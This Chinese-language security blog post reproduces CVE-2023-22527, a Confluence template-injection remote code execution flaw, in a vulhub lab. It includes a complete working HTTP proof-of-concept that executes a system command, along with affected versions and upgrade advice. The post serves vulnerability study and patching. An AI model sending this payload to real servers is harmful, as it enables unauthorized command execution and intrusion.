CVE-2023-22527:Confluence远程代码执行漏洞

admin 2024年3月29日23:23:31评论17 views字数 2368阅读7分53秒阅读模式

关注我们❤️,添加星标🌟,一起学安全!
作者:waterxx@Timeline Sec
本文字数:2230
阅读时长:2~4min
声明:仅供学习参考使用,请勿用作违法用途,否则后果自负

0x01 简介

Atlassian Confluence是一个专业的企业知识管理与协同软件,也可以用于构建企业wiki。使用简单,它强大的编辑和站点管理特征能够帮助团队成员之间共享信息、文档协作、集体讨论,信息推送。

0x02 漏洞概述

漏洞编号:

在Confluence 8.0到8.5.3版本之间,存在一处由于任意velocity模板被调用导致的OGNL表达式注入漏洞,未授权攻击者利用该漏洞可以直接攻击Confluence服务器并执行任意命令。

0x03 影响版本

8.0.x

8.1.x

8.2.x

8.3.x

8.4.x

8.5.0-8.5.3

安全版本:

Confluence Data Center and Server >= 8.5.4 (LTS)

Confluence Data Center >= 8.6.0 (Data Center Only)

Confluence Data Center >= 8.7.1 (Data Center Only)

0x04 环境搭建

直接使用vulhub起docker,找到vulhub/confluence/CVE-2023-22527,

docker-compose up -d

CVE-2023-22527:Confluence远程代码执行漏洞

访问http://127.0.0.1:8090即可进入安装向导

CVE-2023-22527:Confluence远程代码执行漏洞

去Atlassian官方申请一个Confluence Server的测试证书

https://www.atlassian.com/zh/try

申请试用版许可证。

CVE-2023-22527:Confluence远程代码执行漏洞

生成licenses

CVE-2023-22527:Confluence远程代码执行漏洞

获取对应license

CVE-2023-22527:Confluence远程代码执行漏洞

搭建环境

CVE-2023-22527:Confluence远程代码执行漏洞

在填写数据库信息的页面,PostgreSQL数据库地址为db,数据库名称confluence,用户名密码均为postgres

CVE-2023-22527:Confluence远程代码执行漏洞

默认均为第一个选项

CVE-2023-22527:Confluence远程代码执行漏洞
CVE-2023-22527:Confluence远程代码执行漏洞
CVE-2023-22527:Confluence远程代码执行漏洞
CVE-2023-22527:Confluence远程代码执行漏洞

取名test

CVE-2023-22527:Confluence远程代码执行漏洞

搭建完成

CVE-2023-22527:Confluence远程代码执行漏洞

0x05 漏洞复现

回到攻击机,访问对应地址

CVE-2023-22527:Confluence远程代码执行漏洞

poc如下

POST /template/aui/text-inline.vm HTTP/1.1 Host: 192.168.217.130:8090 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,th;q=0.8 Cookie: JSESSIONID=001B30B8B02829BA586B87391DB9510E Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 285 label=u0027%2b#requestu005bu0027.KEY_velocity.struts2.contextu0027u005d.internalGet(u0027ognlu0027).findValue(#parameters.x,{})%2bu0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))
CVE-2023-22527:Confluence远程代码执行漏洞

0x06 修复方式

目前,官方已发布修复建议,建议受影响的用户尽快升级至安全版本。

下载地址:https://www.atlassian.com/zh/software/confluence/download-archives

参考链接

https://blog.projectdiscovery.io/atlassian-confluence-ssti-remote-code-execution/

https://github.com/vulhub/vulhub/blob/master/confluence/CVE-2023-22527/README.zh-cn.md

https://blog.csdn.net/Fortinet_CHINA/article/details/125321120

历史漏洞

CVE-2019-3394

CVE-2019-3396

CVE-2019-3398

CVE-2021-26084

CVE-2022-26134

CVE-2022-26138

CVE-2023-22515

CVE-2023-22527:Confluence远程代码执行漏洞

回复【加群】进入微信交流群
回复【SRC群】进入SRC-QQ交流群
回复【新人】领取新人学习指南资料
回复【面试】获取渗透测试常见面试题
回复【合作】获取各类安全项目合作方式
回复【帮会】付费加入SRC知识库学习
回复培训】获取官方直播精品课程详情

视频号:搜索TimelineSec

官方微博:#小程序://微博/tPbUYdN9EucSD4C

哔哩哔哩:https://space.bilibili.com/524591903

觉得有用就收藏起来吧!
顺便点个赞和在看
CVE-2023-22527:Confluence远程代码执行漏洞

原文始发于微信公众号(Timeline Sec):CVE-2023-22527:Confluence远程代码执行漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年3月29日23:23:31
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2023-22527:Confluence远程代码执行漏洞http://cn-sec.com/archives/2614005.html

发表评论

匿名网友 填写信息